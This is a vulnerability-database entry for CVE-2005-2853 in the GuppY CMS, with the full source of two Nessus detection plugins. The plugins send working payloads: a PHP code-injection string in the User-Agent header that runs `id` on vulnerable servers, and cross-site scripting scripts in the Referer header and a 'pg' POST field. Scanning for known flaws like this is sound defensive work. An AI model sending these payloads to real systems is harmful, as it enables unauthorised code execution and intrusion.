Vulnerabilities > CVE-2005-2853 - Unspecified vulnerability in Guppy 4.5/4.5.3/4.5.3A
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN guppy
nessus
Summary
Multiple cross-site scripting (XSS) vulnerabilities in GuppY 4.5.3a and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the pg parameter to printfaq.php, or the (2) Referer or (3) User-Agent HTTP headers, which are not properly handled by error.php. Note that the header vectors (2) and (3) are more than XSS in practice: the Nessus plugin below reports that, when PHP's magic_quotes_gpc is disabled, the same unsanitized header values lead to PHP code execution with the privileges of the web server user, which is why the plugin's CVSS vectors rate confidentiality, integrity and availability impact rather than the "UNKNOWN" values shown above. The header issue is reported fixed in GuppY 4.5.4; the printfaq.php pg issue is covered together with CVE-2005-3156 by the "< 4.5.6a" plugin, so 4.5.6a or later addresses both.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | GuppY 4.5, 4.5.3 and 4.5.3a (see title) | 3 |
Nessus
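NASL family CGI abuses : XSS NASL id GUPPY_REQUEST_HEADER_FLAWS.NASL description The remote host is running Guppy, a CMS written in PHP. The remote version of this software does not properly sanitize input to the Referer and User-Agent HTTP headers before using it in the 'error.php' script. last seen 2020-06-01 modified 2020-06-02 plugin id 19943 published 2005-10-06 reporter (C) 2005-2018 Josh Zlatin-Amishav source https://www.tenable.com/plugins/nessus/19943 title Guppy Multiple HTTP Header XSS code
#
# Josh Zlatin-Amishav (josh at ramat dot cc)
# GPLv2
#
# Changes by Tenable:
# - Revised plugin title (4/30/09)
# - Fixed typo (5/21/14)
#
# How the check works: one GET to error.php carries a PHP-injection payload
# in User-Agent and a JavaScript payload in Referer. error.php answers with a
# redirect; the redirect target is fetched and its body is searched for the
# output of `id` (code execution) or for the reflected script (XSS).
#
# NOTE(review): this is an ACT_ATTACK plugin. On a vulnerable host the
# User-Agent payload really runs `id` as the web server user; only use it
# where side effects on the target are acceptable.

include("compat.inc");

if (description)
{
  script_id(19943);
  script_version("1.20");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_cve_id("CVE-2005-2853");
  script_bugtraq_id(14753);

  script_name(english:"Guppy Multiple HTTP Header XSS");
  script_summary(english:"Checks for request header injection vulnerabilities in Guppy");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows for arbitrary code execution and cross-site scripting attacks.");
  # nb: "seting" -> "setting" (typo in the user-facing description).
  script_set_attribute(attribute:"description", value:
"The remote host is running Guppy, a CMS written in PHP. The remote version of this software does not properly sanitize input to the Referer and User-Agent HTTP headers before using it in the 'error.php' script.

A malicious user can exploit this flaw to inject arbitrary script and HTML code into a user's browser or, if PHP's 'magic_quotes_gpc' setting is disabled, PHP code to be executed on the remote host subject to the privileges of the web server user id.");
  script_set_attribute(attribute:"see_also", value:"http://www.vupen.com/english/advisories/2005/1639");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Guppy version 4.5.4 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"plugin_publication_date", value:"2005/10/06");
  script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"(C) 2005-2020 Josh Zlatin-Amishav");

  script_dependencies("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);

# A simple alert.
xss = "<script>alert(document.cookie);</script>";

# Loop through CGI directories.
foreach dir (cgi_dirs())
{
  # NASL does not scope variables to the loop body, so reset the per-directory
  # state here: otherwise a Location or `id` match left over from a previous
  # directory would be reused when the current one yields no match.
  url = NULL;
  idres = NULL;

  # Try to exploit the flaw.
  req = string(
    "GET ", dir, "/error.php?err=404 HTTP/1.1\r\n",
    # nb: try to execute id.
    "User-Agent: ", '"; system(id);#', "\r\n",
    # and try to inject some JavaScript.
    "Referer: ", xss, "\r\n",
    "Host: ", get_host_name(), "\r\n",
    "\r\n"
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

  # We need to follow the 302 redirection.
  # HTTP header names are case-insensitive and PHP emits "Location:", so
  # match the header without regard to case.
  pat = "location: (.+)";
  matches = egrep(string:res, pattern:pat, icase:TRUE);
  if (matches)
  {
    foreach match (split(matches))
    {
      match = chomp(match);
      loc = eregmatch(string:match, pattern:pat, icase:TRUE);
      if (loc == NULL) break;
      url = loc[1];
      debug_print("url[", url, "]\n");
      break;
    }
  }

  if (url)
  {
    # Build the request path for the redirect target. The original code only
    # handled a Location relative to the current directory; also accept an
    # absolute path and an absolute URL (the host part is dropped, the probe
    # stays on the same port).
    if (url =~ "^https?://")
    {
      item = ereg_replace(string:url, pattern:"^https?://[^/]*", replace:"");
      if (item == "") item = "/";
    }
    else if (url =~ "^/")
      item = url;
    else
      item = string(dir, "/", url);

    req = http_get(item:item, port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # Get results of id command.
    pat = "^(uid=[0-9]+.*gid=[0-9]+.*)";
    matches = egrep(string:res, pattern:pat);
    if (matches)
    {
      foreach match (split(matches))
      {
        match = chomp(match);
        idmatch = eregmatch(string:match, pattern:pat);
        if (idmatch == NULL) break;
        idres = idmatch[1];
        debug_print("idres[", idres, "]\n");
        break;
      }
    }

    # Check for the results of the id command.
    if (idres)
    {
      report = string(
        "\n",
        "The following is the output received from the 'id' command:\n",
        "\n",
        # Mask the account information before it lands in a report.
        data_protection::sanitize_uid(output:idres),
        "\n"
      );
      security_warning(port:port, extra:report);
      set_kb_item(name:'www/'+port+'/XSS', value:TRUE);
      exit(0);
    }
    # Check for XSS.  Skip the XSS report when the generic check already
    # flagged this server, so the finding is not duplicated.
    else if (xss >< res && !get_kb_item("www/"+port+"/generic_xss"))
    {
      security_warning(port);
      set_kb_item(name:'www/'+port+'/XSS', value:TRUE);
      exit(0);
    }
  }
}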
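NASL family CGI abuses NASL id GUPPY_DIRECTORY_TRAVERSAL.NASL description The remote host is running GuppY / EasyGuppY, a CMS written in PHP. The version of Guppy / EasyGuppY installed on the remote host fails to sanitize user-supplied input to the 'pg' field in the 'printfaq.php' script. last seen 2020-06-01 modified 2020-06-02 plugin id 19942 published 2005-10-06 reporter (C) 2005-2018 Josh Zlatin-Amishav source https://www.tenable.com/plugins/nessus/19942 title GuppY < 4.5.6a Multiple Vulnerabilities code
#
# Josh Zlatin-Amishav (josh at ramat dot cc)
# GPLv2
#
# Changes by Tenable:
# - Revised plugin title, added CVE ref, changed family (4/30/09)
# - Revised plugin description, added CPE (12/03/12)
#
# How the check works: a GET confirms that printfaq.php exists and renders a
# GuppY title, then a POST sends a JavaScript payload in the 'pg' field and
# the response is searched for the unescaped payload.  Only the XSS is
# verified; the directory traversal (CVE-2005-3156) is not exercised (see
# the note inside the loop).

include("compat.inc");

if (description)
{
  script_id(19942);
  script_version("1.19");

  script_cve_id("CVE-2005-2853", "CVE-2005-3156");
  script_bugtraq_id(14752, 14984);

  script_name(english:"GuppY < 4.5.6a Multiple Vulnerabilities");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is prone to cross-site scripting and possibly directory traversal attacks." );
  script_set_attribute(attribute:"description", value:
"The remote host is running GuppY / EasyGuppY, a CMS written in PHP. The version of Guppy / EasyGuppY installed on the remote host fails to sanitize user-supplied input to the 'pg' field in the 'printfaq.php' script. An attacker can exploit this flaw to launch cross-site scripting and possibly directory traversal attacks against the affected application." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Sep/359" );
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 4.5.6a or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"plugin_publication_date", value: "2005/10/06");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/06");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:guppy:guppy");
  script_end_attributes();

  script_summary(english:"Checks for pg parameter flaw in Guppy");

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"(C) 2005-2020 Josh Zlatin-Amishav");

  script_dependencie("http_version.nasl", "cross_site_scripting.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");

  exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");

port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);
# The generic XSS check already reported this server; avoid a duplicate.
if (get_kb_item("www/"+port+"/generic_xss")) exit(0);

# A simple alert.
xss = "<script>alert('" + SCRIPT_NAME + "');</script>";
# nb: the url-encoded version is what we need to pass in.
exss = urlencode(str:xss);

foreach dir (cgi_dirs())
{
  # Make sure the affected script exists.
  req = http_get(item:string(dir, "/printfaq.php?lng=en&pg=1"), port:port);
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # If it does and looks like GuppY...
  if ("<title>GuppY - " >< res)
  {
    # Try to exploit the flaw.
    #
    # nb: we'll use a POST since 4.5.5 prevents GETs from working but
    #     still allows us to pass data via POSTs and cookies.  Also, we
    #     check for the XSS rather than try to read an arbitrary file
    #     since the latter doesn't work with 4.5.5 except under Windows.
    postdata = string('pg=', exss);

    # Build the POST path exactly like the probe above, dir + "/printfaq.php".
    # The original prefixed an extra "/" ("POST /" + dir), which produced
    # "//printfaq.php" for the document root and "//<dir>/printfaq.php"
    # elsewhere -- a different path from the one just confirmed to exist.
    req = string(
      "POST ", dir, "/printfaq.php HTTP/1.1\r\n",
      "Host: ", get_host_name(), "\r\n",
      "Content-Type: application/x-www-form-urlencoded\r\n",
      "Content-Length: ", strlen(postdata), "\r\n",
      "\r\n",
      postdata
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # The payload came back unescaped: the 'pg' field is reflected verbatim.
    if (xss >< res)
    {
      security_warning(port);
      set_kb_item(name:'www/'+port+'/XSS', value:TRUE);
      exit(0);
    }
  }
}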
References
- http://secunia.com/advisories/16707
- http://secunia.com/advisories/16707
- http://www.freeguppy.org/download.php?lng=en
- http://www.freeguppy.org/download.php?lng=en
- http://www.freeguppy.org/thread.php?lng=en&pg=81882&fid=1&cat=200
- http://www.freeguppy.org/thread.php?lng=en&pg=81882&fid=1&cat=200
- http://www.securityfocus.com/bid/14753
- http://www.securityfocus.com/bid/14753